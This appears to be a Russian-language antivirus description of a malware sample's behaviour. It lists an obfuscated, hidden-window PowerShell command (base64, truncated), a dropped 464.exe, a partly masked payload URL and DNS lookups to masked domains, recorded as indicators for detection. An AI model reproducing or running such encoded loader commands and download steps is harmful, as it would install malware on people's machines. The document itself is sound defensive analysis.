Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABOAGQAZwBrAGYAdgBtAHMAcgBrAD0AJwBDAHUAawBuAG4AYgB4AG0AbQBuAHEAZgBrACcAOwAkAFQAdgB3AHcAdwB5AG4AbgAgAD...
- %HOMEPATH%\464.exe
- %HOMEPATH%\464.exe
- %HOMEPATH%\464.exe
- http://se###uyen.com/gieorisj2ke/ltCIlPEpE/
- DNS ASK se###uyen.com
- DNS ASK mo#####acebookvn.com
- DNS ASK wa##sky.com
- DNS ASK wi#####d.wpmudev.host
- DNS ASK pl###heme.ir
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABOAGQAZwBrAGYAdgBtAHMAcgBrAD0AJwBDAHUAawBuAG4AYgB4AG0AbQBuAHEAZgBrACcAOwAkAFQAdgB3AHcAdwB5AG4AbgAgAD...' (со скрытым окном)